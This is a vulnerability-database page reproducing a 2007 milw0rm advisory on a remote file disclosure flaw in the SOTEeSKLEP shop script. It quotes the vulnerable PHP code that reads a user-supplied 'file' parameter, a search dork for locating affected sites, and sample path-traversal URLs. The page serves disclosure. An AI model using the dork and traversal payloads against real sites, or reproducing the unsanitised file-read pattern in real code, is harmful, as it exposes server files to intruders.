Lucene search
K

SOTEeSKLEP <= 3.5RC9 (file) Remote File Disclosure Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 11 Views

SOTEeSKLEP 3.5RC9 Remote File Disclosure Vulnerability on http://www.sote.p

Code

                                                SOTEeSKLEP Remote File Disclosure Vulnerability

Script : SOTEeSKLEP

Versions: 3.1RC8, 3.5RC1, 3.5RC4, 3.5RC9, and i think other.

Site : http://www.sote.pl

Bug:

...
if (! empty($_REQUEST[&#34;file&#34;])) { $file=$_REQUEST[&#39;file&#39;]; }
...
$file_path=&#34;$DOCUMENT_ROOT/themes/_$config-&#62;lang/_html_files/$file&#34;;
if (file_exists($file_path)) { $fd=fopen($file_path,&#34;r&#34;);
$data=fread($fd,filesize($file_path));
print $data;
fclose($fd);
}
...

Dork: inurl:&#34;/go/_files/?file=&#34;

Examples:
http://???/go/_files/?file=./.././.././.././
http://???/go/_files/?file=./.././.././.././go/_files/index.php

Discovered by dun
2007.08.11

# milw0rm.com [2007-08-13]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation